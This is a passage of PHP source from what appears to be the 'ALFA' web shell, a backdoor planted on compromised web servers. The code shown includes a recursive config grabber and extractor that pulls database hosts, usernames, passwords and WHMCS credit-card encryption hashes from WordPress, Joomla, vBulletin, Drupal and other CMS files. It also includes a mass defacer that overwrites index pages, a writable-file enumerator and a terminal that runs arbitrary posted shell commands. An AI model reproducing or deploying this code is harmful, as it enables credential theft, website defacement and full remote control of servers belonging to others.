5870 echo '</table>';
5871 }catch(Exception $e){
5872 echo("0");
5873 }
5874}
5875function alfaopen_archive_dir(){
5876 $dir = $_POST["alfa1"];
5877 $base_id = $_POST["alfa2"];
5878 __alfa_open_archive_file($dir, $base_id);
5879}
5880function alfaconfig_grabber(){
5881 alfahead();
5882 echo '<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>';
5883 echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
5884 <div class="txtfont">
5885 Dir: <input size="50" id="target" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5886 Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5887 <input type="submit" name="btn" value=" "></div></form></center><br>';
5888 $dir = $_POST['alfa2'];
5889 $ext = $_POST['alfa3'];
5890 if($_POST['alfa5']=='>>'){
5891 echo __pre();
5892 Alfa_ConfigGrabber($dir, $ext);
5893 }
5894 echo '</div>';
5895 alfafooter();
5896}
5897function Alfa_ConfigGrabber($dir, $ext) {
5898 $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
5899 $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
5900 if(@is_readable($dir)){
5901 $globFiles = @glob("$dir/*.$ext");
5902 $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
5903 $blacklist = array();
5904 foreach ($globDirs as $dir) {
5905 if(!@is_readable($dir)||@is_link($dir)) continue;
5906 @Alfa_ConfigGrabber($dir, $ext);
5907 }
5908 foreach ($globFiles as $file){
5909 $filee = @file_get_contents($file);
5910 if(preg_match($pattern, $filee)){
5911 echo "<div><span>$file</span> <a style='cursor:pointer;' onclick=\"editor('".$file."','auto','','','','file');\">[ View file ]</a></div>";
5912 }
5913 }
5914 }
5915}
5916function alfasearcher(){
5917alfahead();
5918echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
5919if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
5920echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
5921<div class="txtfont">
5922Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
5923Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
5924Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5925<input type="submit" name="btn" value=" "></div></form></center><br>';
5926$dir = $_POST['alfa2'];
5927$ext = $_POST['alfa3'];
5928$method = $_POST['alfa4'];
5929if($_POST['alfa5']=='>>'){
5930echo __pre();
5931if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
5932Alfa_Searcher($dir,trim($ext),$method);
5933}
5934}
5935if($_POST['alfa1']=='str'){
5936echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
5937<div class="txtfont">
5938Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
5939String: <input type="text" name="string" value="">
5940Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5941Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5942<input type="submit" name="btn" value=" "></div></form></center><br>';
5943$dir = $_POST['alfa2'];
5944$string = $_POST['alfa3'];
5945$ext = $_POST['alfa5'];
5946if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
5947echo __pre();
5948Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
5949}
5950}
5951echo '</div>';
5952alfafooter();
5953}
5954function alfaMassDefacer(){
5955alfahead();
5956AlfaNum(5,6,7,8,9,10);
5957echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
5958echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
5959 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
5960 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
5961</form>';
5962$dir = $_POST['alfa1'];
5963$defpage = $_POST['alfa2'];
5964$method = $_POST['alfa3'];
5965$fCurrent = $GLOBALS['__file_path'];
5966if($_POST['alfa4'] == '>>'){
5967if(!empty($dir)){
5968if(@is_dir($dir)){
5969if(@is_readable($dir)){
5970if(@is_file($defpage)){
5971if($dh = @opendir($dir)){
5972echo __pre();
5973while (($file = @readdir($dh)) !== false){
5974if($file == '..' || $file == '.')continue;
5975$newfile=$dir.$file;
5976if($fCurrent == $newfile)continue;
5977if(@is_dir($newfile)){
5978Alfa_ReadDir($newfile,$method,$defpage);
5979}else{
5980if(!@is_writable($newfile))continue;
5981if(!@is_readable($newfile))continue;
5982Alfa_Rewriter($newfile,$file,$defpage,$method);
5983}
5984}
5985closedir($dh);
5986}else{__alert('<font color="red">Error In OpenDir...</font>');}
5987}else{__alert('<font color="red">DefPage File NotFound...</font>');}
5988}else{__alert('<font color="red">Directory is not Readable...</font>');}
5989}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
5990}else{__alert('<font color="red">Dir is Empty...</font>');}
5991}
5992echo '</div>';
5993alfafooter();
5994}
5995function Alfa_ReadDir($dir,$method='',$defpage=''){
5996if(!@is_readable($dir)) return false;
5997if (@is_dir($dir)) {
5998if ($dh = @opendir($dir)) {
5999while(($file=readdir($dh))!==false) {
6000if($file == '..' || $file == '.')continue;
6001$newfile=$dir.'/'.$file;
6002if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
6003if(@is_file($newfile)){
6004if(!@is_readable($newfile))continue;
6005Alfa_Rewriter($newfile,$file,$defpage,$method);
6006}
6007}
6008closedir($dh);
6009}
6010}
6011}
6012function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
6013if(!@is_writable($dir)) return false;
6014if(!@is_readable($dir)) return false;
6015$defpage=@file_get_contents($defpage);
6016if($m == 'index'){
6017$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
6018if(in_array(strtolower($file),$indexs)){
6019@file_put_contents($dir,$defpage);
6020echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
6021}
6022}elseif($m=='all'){
6023@file_put_contents($dir,$defpage);
6024echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
6025}
6026}
6027function alfaGetDisFunc(){
6028alfahead();
6029echo '<div class="header">';
6030$disfun = @ini_get('disable_functions');
6031$s = explode(',',$disfun);
6032$f = array_unique($s);
6033echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
6034$i=1;
6035foreach($f as $s){
6036$s=trim($s);
6037if(function_exists($s)||!is_callable($s))continue;
6038echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
6039echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
6040$i++;
6041}
6042echo '</table></center>';
6043echo '</div>';
6044alfafooter();
6045}
6046function Alfa_Create_A_Tag($action,$vals){
6047$nulls = array();
6048foreach($vals as $key => $val){
6049echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
6050for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
6051$f = implode(',',$nulls);
6052echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
6053unset($nulls);
6054}
6055}
6056function Alfa_Searcher($dir, $ext, $method) {
6057if(@is_readable($dir)){
6058if($method == 'all')$ext = '*';
6059if($method == 'dirs')$ext = '*';
6060$globFiles = @glob("$dir/*.$ext");
6061$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6062$blacklist = array();
6063foreach ($globDirs as $dir) {
6064if(!@is_readable($dir)||@is_link($dir)) continue;
6065@Alfa_Searcher($dir, $ext, $method);
6066}
6067switch($method){
6068case "files":
6069foreach ($globFiles as $file){
6070if(@is_writable($file)){
6071echo "$file<br>";
6072}
6073}
6074break;
6075case "dirs":
6076foreach ($globFiles as $file){
6077if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
6078echo dirname($file).'<br>';
6079$blacklist[] = dirname($file);
6080}
6081}
6082break;
6083case "all":
6084foreach ($globFiles as $file){
6085echo $file.'<br>';
6086}
6087break;
6088}
6089unset($blacklist);
6090}
6091}
6092function AlfaiFrameCreator($f,$width='100%',$height='600px'){
6093return('<iframe src="'.__ALFA_DATA_FOLDER__."/".$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
6094}
6095class AlfaCURL {
6096public $headers;
6097public $user_agent;
6098public $compression;
6099public $cookie_file;
6100public $proxy;
6101public $path;
6102public $ssl = true;
6103public $curl_status = true;
6104function __construct($cookies=false,$compression='gzip',$proxy=''){
6105if(!extension_loaded('curl')){$curl_status = false;return false;}
6106$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6107$this->headers[] = 'Connection: Keep-Alive';
6108$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6109$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
6110$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6111$this->compression=$compression;
6112$this->proxy=$proxy;
6113$this->cookies=$cookies;
6114if($this->cookies)$this->cookie($this->path);
6115}
6116function cookie($cookie_file) {
6117if (_alfa_file_exists($cookie_file,false)) {
6118$this->cookie_file=$cookie_file;
6119}else{
6120@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
6121$this->cookie_file=$cookie_file;
6122@fclose($this->cookie_file);
6123}
6124}
6125function Send($url,$method="get",$data=""){
6126if(!$this->curl_status){return false;}
6127$process = curl_init($url);
6128curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
6129curl_setopt($process, CURLOPT_HEADER, 0);
6130curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
6131curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
6132curl_setopt($process, CURLOPT_ENCODING , $this->compression);
6133curl_setopt($process, CURLOPT_TIMEOUT, 30);
6134if($this->ssl){
6135curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
6136curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
6137}
6138if($this->cookies){
6139curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
6140curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
6141}
6142if($this->proxy){
6143curl_setopt($process, CURLOPT_PROXY, $this->proxy);
6144}
6145if($method=='post'){
6146curl_setopt($process, CURLOPT_POSTFIELDS, $data);
6147curl_setopt($process, CURLOPT_POST, 1);
6148curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
6149}
6150$return = @curl_exec($process);
6151curl_close($process);
6152return $return;
6153}
6154function error($error) {
6155echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
6156die;
6157}
6158}
6159function getConfigHtml($cms){
6160$content = '';
6161$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
6162$content .= "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
6163foreach($cms_array as $key => $val){
6164$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
6165}
6166$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
6167$content .= "</form>";
6168return $content;
6169}
6170if (!function_exists('json_encode')){
6171 function json_encode($a=false){
6172 if (is_null($a)) return 'null';
6173 if ($a === false) return 'false';
6174 if ($a === true) return 'true';
6175 if (is_scalar($a))
6176 {
6177 if (is_float($a))
6178 {
6179 return floatval(str_replace(",", ".", strval($a)));
6180 }
6181
6182 if (is_string($a))
6183 {
6184 static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
6185 return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
6186 }
6187 else
6188 return $a;
6189 }
6190 $isList = true;
6191 for ($i = 0, reset($a); $i < count($a); $i++, next($a))
6192 {
6193 if (key($a) !== $i)
6194 {
6195 $isList = false;
6196 break;
6197 }
6198 }
6199 $result = array();
6200 if ($isList)
6201 {
6202 foreach ($a as $v) $result[] = json_encode($v);
6203 return '[' . join(',', $result) . ']';
6204 }
6205 else
6206 {
6207 foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
6208 return '{' . join(',', $result) . '}';
6209 }
6210 }
6211}
6212if ( !function_exists('json_decode') ){
6213function json_decode($json, $array=true){
6214 $comment = false;
6215 $out = '$x=';
6216 for ($i=0; $i<strlen($json); $i++)
6217 {
6218 if (!$comment)
6219 {
6220 if ($json[$i] == '{' || $json[$i] == '['){$out .= ' array(';}
6221 else if ($json[$i] == '}' || $json[$i] == ']'){$out .= ')';}
6222 else if ($json[$i] == ':'){$out .= '=>';}
6223 else {$out .= $json[$i];}
6224 }
6225 else $out .= $json[$i];
6226 if ($json[$i] == '"') $comment = !$comment;
6227 }
6228 eval($out . ';');
6229 return $x;
6230}
6231}
6232function alfaterminalExec(){
6233 $pwd = "pwd";
6234 $seperator = ";";
6235 if($GLOBALS['sys']!='unix'){
6236 $pwd = "cd";
6237 $seperator = "&";
6238 }
6239 if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."'".$seperator;}
6240 $current_path = '';
6241 if(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)){
6242 if(empty($match[1])){
6243 $match[1] = $match[2];
6244 }
6245 $current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);
6246 $current_path = str_replace("\\", "/", $current_path);
6247 }
6248 $out = alfaEx($cmd.$_POST['alfa1'], true);
6249 $out = htmlspecialchars($out);
6250 echo json_encode(array("output" => convertBash($out), "path" => $current_path));
6251}
6252function convertBash($code) {
6253 $dictionary = array(
6254 '[01;30m' => '<span style="color:black">',
6255 '[01;31m' => '<span style="color:red">',
6256 '[01;32m' => '<span style="color:green">',
6257 '[01;33m' => '<span style="color:yellow">',
6258 '[01;34m' => '<span style="color:blue">',
6259 '[01;35m' => '<span style="color:purple">',
6260 '[01;36m' => '<span style="color:cyan">',
6261 '[01;37m' => '<span style="color:white">',
6262 '[0m' => '</span>'
6263 );
6264 $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
6265 return $htmlString;
6266}
6267function alfadoActions(){
6268 $chdir_fals = false;
6269 if(!@chdir($_POST['c'])){
6270 $chdir_fals = true;
6271 $alfa_canruncmd = _alfa_can_runCommand(true,true);
6272 }
6273 if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
6274 if(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);
6275 $action = $_POST["alfa3"];
6276 if($action == "permission"){
6277 $perms = 0;
6278 $perm = $_POST["alfa2"];
6279 for($i=strlen($perm)-1;$i>=0;--$i){
6280 $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
6281 }
6282 if(@chmod($_POST['alfa1'], $perms)){
6283 echo("done");
6284 }else{
6285 echo("no");
6286 }
6287 return;
6288 }
6289 if($action == "rename" || $action == "move"){
6290 $alfa1_decoded = $_POST['alfa1'];
6291 if($chdir_fals){
6292 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
6293 }
6294 $_POST['alfa1'] = trim($_POST['alfa1']);
6295 $alfa1_escape = addslashes($_POST["alfa1"]);
6296 if($_POST["alfa3"] == "rename"){
6297 $_POST['alfa2'] = basename($_POST['alfa2']);
6298 }
6299 if(!empty($_POST['alfa2'])){
6300 $cmd_rename = false;
6301 if($chdir_fals&&$alfa_canruncmd){
6302 if(_alfa_is_writable($_POST['alfa1'])){
6303 $cmd_rename = true;
6304 $alfa1_escape = addslashes($alfa1_decoded);
6305 alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'");
6306 }
6307 }
6308 if(!file_exists($_POST['alfa2'])){
6309 if(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){
6310 echo "done";
6311 }else{
6312 echo "no";
6313 }
6314 }else{
6315 echo "no";
6316 }
6317 }
6318 }elseif($action == "copy"){
6319 if(is_dir($_POST["alfa1"])){
6320 $dir = str_replace('//', '/', $_POST["alfa1"]);
6321 $dir = explode('/', $dir);
6322 if(empty($dir[count($dir) - 1])){
6323 $name = $dir[count($dir) - 2];
6324 }else{
6325 $name = $dir[count($dir) - 1];
6326 }
6327 }else{
6328 $name = basename($_POST["alfa1"]);
6329 }
6330 $dir = dirname($_POST["alfa1"]);
6331 if($dir == "."){
6332 $dir = $_POST["c"]."/";
6333 }
6334 if(is_file($_POST["alfa1"])){
6335 @copy($_POST["alfa1"], $_POST["alfa2"]);
6336 echo("done");
6337 }elseif(is_dir($_POST["alfa1"])){
6338 if(!is_dir($_POST["alfa2"])){
6339 mkdir($_POST["alfa2"], 0755, true);
6340 }
6341 copy_paste($dir, $name , $_POST["alfa2"] . "/");
6342 echo("done");
6343 }
6344 }elseif($action == "modify"){
6345 if( !empty($_POST['alfa1']) ) {
6346 $time = strtotime($_POST['alfa1']);
6347 if($time){
6348 $touched = false;
6349 if($chdir_fals&&$alfa_canruncmd){
6350 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'");
6351 $touched = true;
6352 }
6353 if(!@touch($_POST['alfa2'],$time,$time)&&!$touched){
6354 echo 'no';
6355 }else{
6356 echo 'ok';
6357 }
6358 } else{
6359 echo 'badtime';
6360 }
6361 }
6362 }
6363
6364}
6365function alfaget_flags(){
6366 $flags = array();
6367 if(function_exists("curl_version")){
6368 $curl = new AlfaCURL();
6369 $server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]);
6370 $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
6371 $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
6372 if(strpos($flag2, "geoplugin") != false){
6373 $flag = json_decode($flag, true);
6374 $flag2 = json_decode($flag2, true);
6375 if(!empty($flag['geoplugin_countryCode'])){
6376 $flags["server"]["name"] = $flag['geoplugin_countryName'];
6377 $flags["server"]["code"] = $flag['geoplugin_countryCode'];
6378 }
6379 if(!empty($flag2['geoplugin_countryCode'])){
6380 $flags["client"]["name"] = $flag2['geoplugin_countryName'];
6381 $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
6382 }
6383 }
6384 }
6385 echo json_encode($flags);
6386}
6387function alfaGetConfig(){
6388$cms = $_POST['alfa1'];
6389$path = trim($_POST['alfa2']);
6390$config = array(
6391'wp'=>array('file'=>'/wp-config.php',
6392'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6393'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6394'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6395'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6396'prefix'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1)
6397),
6398'drupal'=>array('file'=>'/config.php',
6399'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6400'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6401'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6402'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6403'prefix'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1)
6404),
6405'drupal2'=>array('file'=>'/sites/default/settings.php',
6406'host'=>array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6407'dbname'=>array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6408'dbuser'=>array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6409'dbpw'=>array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6410'prefix'=>array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1)
6411),
6412'vb'=>array('file'=>'/includes/config.php',
6413'host'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6414'dbuser'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6415'dbname'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6416'dbpw'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6417'prefix'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3)
6418),
6419'phpnuke'=>array('file'=>'/config.php',
6420'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6421'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6422'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6423'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6424'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
6425),
6426'smf'=>array('file'=>'/Settings.php',
6427'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6428'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6429'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6430'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6431'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6432),
6433'whmcs'=>array('file'=>'/configuration.php',
6434'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6435'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6436'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6437'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6438'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6439),
6440'joomla'=>array('file'=>'/configuration.php',
6441'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6442'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6443'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6444'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6445'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6446),
6447'phpbb'=>array('file'=>'/config.php',
6448'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6449'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6450'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6451'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6452'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6453),
6454'mybb'=>array('file'=>'/inc/config.php',
6455'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6456'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6457'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6458'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6459'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6460)
6461);
6462if($cms == "drupal"){
6463 $file = $config[$cms]['file'];
6464 $file=$path.$file;
6465 if(@is_file($file)||_alfa_is_dir($file,"-e")){
6466 }else{
6467 $cms = 'drupal2';
6468 }
6469}
6470if($cms == "vb"){
6471 $file = $config[$cms]['file'];
6472 $file=$path.$file;
6473 if(@is_file($file)||_alfa_is_dir($file,"-e")){
6474 }else{
6475 $path .= '/core';
6476 }
6477}
6478$data = array();
6479$srch_host = $config[$cms]['host'][0];
6480$srch_user = $config[$cms]['dbuser'][0];
6481$srch_name = $config[$cms]['dbname'][0];
6482$srch_pw = $config[$cms]['dbpw'][0];
6483$prefix = $config[$cms]['prefix'][0];
6484$file = $config[$cms]['file'];
